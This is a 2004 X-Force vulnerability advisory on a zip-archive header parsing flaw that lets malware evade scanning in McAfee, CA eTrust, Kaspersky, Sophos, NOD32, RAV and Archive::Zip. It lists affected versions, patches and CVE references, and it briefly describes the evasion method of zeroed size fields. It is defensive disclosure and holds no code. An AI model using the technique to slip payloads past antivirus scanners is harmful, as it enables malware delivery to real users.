Multiple vendor antivirus .zip bypass protection

antivirus-zip-protection-bypass (17761) The risk level is classified as MediumMedium Risk

Description:

Multiple vendor antivirus scanners including: McAfee VirusScan, InoculateIT, eTrust Antivirus, eTrust Intrusion Detection System, eTrust Secure Content Manager, eTrust EZ Armor, BrightStor ARCserve Backup, Kaspersky Antivirus (KAV), Sophos Anti-Virus RAV AntiVirus Online Virus Scan and NOD32 could allow a remote attacker to bypass antivirus protection, caused by improper parsing of .zip archive headers. By creating a specially-crafted .zip file archive and setting the uncompressed size within the local and global headers to zero, a remote attacker could send a malicious payload within this compressed archive to bypass antivirus protection.

Note: Archive::Zip, a freely available Perl module, version 1.13 is also affected by this vulnerability.

Platforms Affected:

  • CA, BrightStor ARCserve Backup for Windows 11.1
  • CA, eTrust Antivirus 7.0
  • CA, eTrust Antivirus 7.1
  • CA, eTrust EZ Antivirus 6.1
  • CA, eTrust EZ Antivirus 6.2
  • CA, eTrust EZ Antivirus 6.3
  • CA, eTrust EZ Armor 2.0
  • CA, eTrust EZ Armor 2.3
  • CA, eTrust EZ Armor 2.4
  • CA, eTrust Intrusion Detection
  • CA, eTrust Secure Content Manager 8.0
  • CA, InoculateIT 6.0
  • ESET, NOD32 Antivirus
  • GeCAD Software, RAV AntiVirus Online Virus Scan
  • Gentoo, Linux
  • Kaspersky, Kaspersky Anti-Virus
  • MandrakeSoft, Mandrake Linux 10.0
  • McAfee, VirusScan
  • Ned Konz, Archive::Zip 1.13
  • Sophos, Sophos Anti-Virus

Remedy:

For McAfee VirusScan:
Upgrade to the latest DATS Driver (4399 or later), available from the McAfee DAT Files Downloads Web page or McAfee Anti-Virus Updates Web page. See References.

For InoculateIT, eTrust Antivirus, eTrust Secure Content Manager, eTrust Intrusion Detection, EZ-Armor, EZ-Antivirus and BrightStor ARCserve Backup:
Apply the appropriate update for your system, available from the Computer Associates Web site. See References.

For Kaspersky Antivirus (KAV):
For scanners based on the 3.x through 4.x engines, apply the latest cumulative update, when it becomes available from the Kaspersky Web site. For scanners based on the 5.0 engine, apply the latest maintenance pack, when it becomes available from the Kaspersky Web site.

For NOD32:
Upgrade to the latest archive-support module (1.020 or later), available from the ESET Web site. See References.

For Gentoo Linux:
Upgrade to the latest version of Archive::Zip (1.14 or later), as listed in GLSA 200410-31. See References.

For Mandrake Linux:
Upgrade to the latest aperl-Archive-Zip package, as listed below. Refer to MandrakeSoft Security Advisory MDKSA-2004:118 for more information. See References.

Mandrake Linux 10.0: 1.14-1.0.101mdk or later

For other distributions:
Contact your vendor for upgrade or patch information.

Consequences:

Bypass Security

References:

  • CA SupportConnect Web site, Arclib.dll Vulnerability at http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp.
  • iDEFENSE Security Advisory 10.18.04, Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability at http://www.idefense.com/application/poi/display?id=153&type=vulnerabilities&flashstatus=true.
  • Kaspersky Web site, Kaspersky Labs - antivirus protection - protect your cyberspace at http://www.kaspersky.com/.
  • McAfee Anti-Virus Updates Web page, Anti-Virus Updates at http://download.mcafee.com/uk/updates/updates.asp.
  • McAfee DAT Files Dowloads Web page, DAT Files at http://www.mcafeesecurity.com/uk/downloads/updates/dat.asp?id=1.
  • BID-11448: Multiple Vendor Antivirus Software Zip Files Detection Evasion Vulnerability
  • CVE-2004-0932: McAfee Anti-Virus Engine DATS drivers before 4398 released on Oct 13th 2004 and DATS Driver before 4397 October 6th 2004 allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.
  • CVE-2004-0933: Computer Associates (CA) InoculateIT 6.0, eTrust Antivirus r6.0 through r7.1, eTrust Antivirus for the Gateway r7.0 and r7.1, eTrust Secure Content Manager, eTrust Intrusion Detection, EZ-Armor 2.0 through 2.4, and EZ-Antivirus 6.1 through 6.3 allow remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.
  • CVE-2004-0934: Kaspersky 3.x to 4.x allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.
  • CVE-2004-0935: Eset Anti-Virus before 1.020 (16th September 2004) allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.
  • CVE-2004-0936: RAV antivirus allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.
  • CVE-2004-0937: Sophos Anti-Virus before 3.87.0, and Sophos Anti-Virus for Windows 95, 98, and Me before 3.88.0, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.
  • CVE-2004-1096: Archive::Zip Perl module before 1.14, when used by antivirus programs such as amavisd-new, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.
  • GLSA-200410-31: Archive::Zip: Virus detection evasion
  • MDKSA-2004:118: Updated perl-Archive-Zip packages fix vulnerability
  • SA13038: Archive::Zip Zip Archive Virus Detection Bypass Vulnerability
  • US-CERT VU#492545: Archive::Zip may not properly parse the file sizes of Zip archives
  • US-CERT VU#968818: Anti-virus software may not properly scan malformed zip archives

Reported:

Oct 18, 2004

The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (IBM Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

For corrections or additions please email xforce@iss.net

Return to the main page